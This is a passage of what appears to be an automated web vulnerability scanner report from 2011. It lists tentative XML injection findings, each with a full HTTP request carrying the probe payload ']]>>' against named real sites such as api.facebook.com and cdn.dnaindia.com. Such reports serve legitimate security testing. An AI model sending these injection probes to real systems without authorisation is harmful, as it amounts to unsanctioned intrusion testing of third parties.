The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /util/companions.php]]>> HTTP/1.1
Host: ad4.liverail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 04:06:38 GMT
Server: lighttpd/1.4.28

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.3. http://addoer.com/showfixads.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://addoer.com
Path:   /showfixads.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /showfixads.php]]>>?tabname=c0002761&frame=yes HTTP/1.1
Host: addoer.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Connection: close
P3P: CP=NOI DSP COR NID ADMa OUR IND NAV; policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 02:26:33 GMT
Server: Sun Java System

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.4. http://api.facebook.com/restserver.php [format parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Ftimesofindia.indiatimes.com%2Fcity%2Fmumbai%2FMy-friend-Ganesha%2Farticleshow%2F9855193.cms%22%5D&format=json]]>>&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/newtoolbar/9855193.cms?args=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 03 Sep 2011 20:12:45 -0700
Pragma:
X-FB-Rev: 434551
X-FB-Server: 10.54.9.42
X-Cnection: close
Date: Sun, 04 Sep 2011 03:10:45 GMT
Content-Length: 844

fb_sharepro_render('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<links_getStats_response xmlns=\"http://api.facebook.com/1.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://api.facebook.com/1.0/ http://api.facebook.com/1.0/facebook.xsd\" list=\"true\">
...[SNIP]...

10.5. http://api.tweetmeme.com/v2/follow.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://api.tweetmeme.com
Path:   /v2/follow.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /v2/follow.js]]>> HTTP/1.1
Host: api.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 04:13:04 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
X-Served-By: h03
Content-Length: 125

<?xml version="1.0" encoding="UTF-8"?>
<result><status>failure</status><reason>missing param 'screen_name'</reason></result>

10.6. http://cdn.dnaindia.com/images/710/favicon-delicious.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.dnaindia.com
Path:   /images/710/favicon-delicious.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/710/favicon-delicious.ico HTTP/1.1
Host: cdn.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 184FA8720050C01C
x-amz-id-2: UlWECT75JZ7uA4wHOuwEqzLtmZYp0pbA9YwKSKb6pNL0MeCXiZmYqRqfO1qVuJxe
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:18:43 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e92041e9f15f6504878ee0dc72af0dd10ab3e3725488cc938f4d6fed52e4709c010c111a46a1878a
Via: 1.0 db26aad8eddbf74ac3abe77abd5de63f.cloudfront.net:11180 (CloudFront), 1.0 1e5670446b2d0f62f93100e25163ce0a.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>184FA8720050C01C</RequestId><HostId>UlWECT75JZ7uA4wHOuwEqzLtmZYp0pbA9YwKSKb6pNL0MeCXiZ
...[SNIP]...

10.7. http://cdn.dnaindia.com/images/710/favicon-delicious.ico [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.dnaindia.com
Path:   /images/710/favicon-delicious.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/710]]>>/favicon-delicious.ico HTTP/1.1
Host: cdn.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F34BE9D3408E0082
x-amz-id-2: yFK2tJGFHGnhkMYJgYpEf4DIfMbXKODL8TUauhKGiN2ov+61tKDNplz+O+DF6GgJ
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:18:58 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 36cfbbb705565c86bd6921a81c68a5fb3d19ddd66690bcc5f530d469cce3becb8867fe5fe95d7acc
Via: 1.0 c36847c5252e758d61b94a1d396be659.cloudfront.net:11180 (CloudFront), 1.0 1e5670446b2d0f62f93100e25163ce0a.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F34BE9D3408E0082</RequestId><HostId>yFK2tJGFHGnhkMYJgYpEf4DIfMbXKODL8TUauhKGiN2ov+61tK
...[SNIP]...

10.8. http://cdn.dnaindia.com/images/710/favicon-delicious.ico [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.dnaindia.com
Path:   /images/710/favicon-delicious.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/710/favicon-delicious.ico]]>> HTTP/1.1
Host: cdn.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 39A09F5D03A5859D
x-amz-id-2: +uplekIEdYudGEH3IuuFnx9cIOdYFqrFn3FhXGGM3xcD7EROWCF1COJbmgVn57fD
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:19:10 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 33f88b4b2a4f5c73b90f7cf7a002d08aa72bb6da044cdc65bb88fc7b976ab47108e48fdaf509a5c1
Via: 1.0 95b17deadcb6eb61302c26e3cdac6107.cloudfront.net:11180 (CloudFront), 1.0 1e5670446b2d0f62f93100e25163ce0a.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>39A09F5D03A5859D</RequestId><HostId>+uplekIEdYudGEH3IuuFnx9cIOdYFqrFn3FhXGGM3xcD7EROWC
...[SNIP]...

10.9. http://cdn.dnaindia.com/images/710/favicon-digg.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.dnaindia.com
Path:   /images/710/favicon-digg.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/710/favicon-digg.ico HTTP/1.1
Host: cdn.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: FAAA2BF7CBC8F930
x-amz-id-2: qLAbzOasKhlpEbbAQhGCK+hrujQ2zRjCXeBswZlz8y4bIX7Iev7E6DHxdjFEIaeV
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:17:40 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 754540a91d773c79042713ef64dce01326bda057ae4308a2cb686012cd50b895709d557f945f93f1
Via: 1.0 a1c5ac3682794e4a6d3935bd273efd27.cloudfront.net:11180 (CloudFront), 1.0 9944d439be34815bf637b293c33c4694.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>FAAA2BF7CBC8F930</RequestId><HostId>qLAbzOasKhlpEbbAQhGCK+hrujQ2zRjCXeBswZlz8y4bIX7Iev
...[SNIP]...

10.10. http://cdn.dnaindia.com/images/710/favicon-digg.ico [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.dnaindia.com
Path:   /images/710/favicon-digg.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/710]]>>/favicon-digg.ico HTTP/1.1
Host: cdn.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: EE6645D5D7F96527
x-amz-id-2: Lgji0v6KXi7VnMWWP4CJqBF3mvCMN2Kr3UShl0H8I1EFLwxMCuPuo4AjbwWN+mks
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:17:55 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: b722e180e453e756450341d4718495a7e519b56c12ec0bcb58c66acea2ac71437f18e4714ca8f7c0
Via: 1.0 c36847c5252e758d61b94a1d396be659.cloudfront.net:11180 (CloudFront), 1.0 9944d439be34815bf637b293c33c4694.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EE6645D5D7F96527</RequestId><HostId>Lgji0v6KXi7VnMWWP4CJqBF3mvCMN2Kr3UShl0H8I1EFLwxMCu
...[SNIP]...

10.11. http://cdn.dnaindia.com/images/710/favicon-digg.ico [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.dnaindia.com
Path:   /images/710/favicon-digg.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/710/favicon-digg.ico]]>> HTTP/1.1
Host: cdn.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4AF5F75D8C542B94
x-amz-id-2: mzKjgehFfvPurzI71j1vXfb15wPYI5uI51sgTJjgFikWc0XFnyqFaOYX4cnbaqi1
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:18:07 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 6236cff32897463655be697020f64cb1405760333da88e1ed7b4c3939c473efad317cd7e6bbb8ce1
Via: 1.0 a4a33eb6d328de8565b9c9b34e7c790d.cloudfront.net:11180 (CloudFront), 1.0 9944d439be34815bf637b293c33c4694.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4AF5F75D8C542B94</RequestId><HostId>mzKjgehFfvPurzI71j1vXfb15wPYI5uI51sgTJjgFikWc0XFny
...[SNIP]...

10.12. http://cdn.dnaindia.com/images/710/favicon-google-bookmark.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.dnaindia.com
Path:   /images/710/favicon-google-bookmark.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/710/favicon-google-bookmark.ico HTTP/1.1
Host: cdn.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6782D59D2A9A00F3
x-amz-id-2: LGbqm14MYfAEFD+Rcku8H0DcywkKcyhbsyPanHaVbLce3pogaI+Xff3HGONfEJuH
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:17:22 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2f2d4ffd699c93acf9b85735198e5f9ab3a3c2e5aa2763430139c4730e6ea5455ae909b6707e2a74
Via: 1.0 a1c5ac3682794e4a6d3935bd273efd27.cloudfront.net:11180 (CloudFront), 1.0 9944d439be34815bf637b293c33c4694.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6782D59D2A9A00F3</RequestId><HostId>LGbqm14MYfAEFD+Rcku8H0DcywkKcyhbsyPanHaVbLce3pogaI
...[SNIP]...

10.13. http://cdn.dnaindia.com/images/710/favicon-google-bookmark.ico [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.dnaindia.com
Path:   /images/710/favicon-google-bookmark.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/710]]>>/favicon-google-bookmark.ico HTTP/1.1
Host: cdn.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A08B16BA97396B64
x-amz-id-2: dMweQ8+5PJBPGR/pFeJHjizvby/F4BqCW4WuATNgngzSPWVnMeGgwpzWiSJonogd
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:17:37 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 1f2e4ed98c93dc8343a4822b7b93e281e437adca07786268f48dd9611bc0a707f7a4ac7d1be81034
Via: 1.0 8ff11be393de0e3f4a1ed1dda26bfcdd.cloudfront.net:11180 (CloudFront), 1.0 9944d439be34815bf637b293c33c4694.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A08B16BA97396B64</RequestId><HostId>dMweQ8+5PJBPGR/pFeJHjizvby/F4BqCW4WuATNgngzSPWVnMe
...[SNIP]...

10.14. http://cdn.dnaindia.com/images/710/favicon-google-bookmark.ico [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.dnaindia.com
Path:   /images/710/favicon-google-bookmark.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/710/favicon-google-bookmark.ico]]>> HTTP/1.1
Host: cdn.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3CA54A8A87A27CF2
x-amz-id-2: eIFssQ+ZAKzRPC9ULXg5wZmugdfijD0k9wkUqeZ6ipHQ4qr17SSUATex+zv8nFEK
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:17:50 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 5fdbb89abd101eacfba32dfa361c986acc4a6b28a20f8bc88a28cf94e2b3517198830ba5d4e626c0
Via: 1.0 2ba8d32c0ef1d73da2fcae191d906606.cloudfront.net:11180 (CloudFront), 1.0 9944d439be34815bf637b293c33c4694.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3CA54A8A87A27CF2</RequestId><HostId>eIFssQ+ZAKzRPC9ULXg5wZmugdfijD0k9wkUqeZ6ipHQ4qr17S
...[SNIP]...

10.15. http://cdn.dnaindia.com/images/710/favicon-reddit.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.dnaindia.com
Path:   /images/710/favicon-reddit.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/710/favicon-reddit.ico HTTP/1.1
Host: cdn.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AFD013D5CDFD2CB6
x-amz-id-2: p7epMHaE2hkAMn2+vUf06O8ZLNKRh3bJgEx6/DlUB0525WgjhVpgy4nnVF2BPO1U
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:19:12 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 113abdcb347caa24ad6a739344b0ffea0733ecb628975c8117e1f8bcf3e118c8ed4aa7e1e22b7585
Via: 1.0 db26aad8eddbf74ac3abe77abd5de63f.cloudfront.net:11180 (CloudFront), 1.0 1e5670446b2d0f62f93100e25163ce0a.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AFD013D5CDFD2CB6</RequestId><HostId>p7epMHaE2hkAMn2+vUf06O8ZLNKRh3bJgEx6/DlUB0525WgjhV
...[SNIP]...

10.16. http://cdn.dnaindia.com/images/710/favicon-reddit.ico [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.dnaindia.com
Path:   /images/710/favicon-reddit.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/710]]>>/favicon-reddit.ico HTTP/1.1
Host: cdn.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
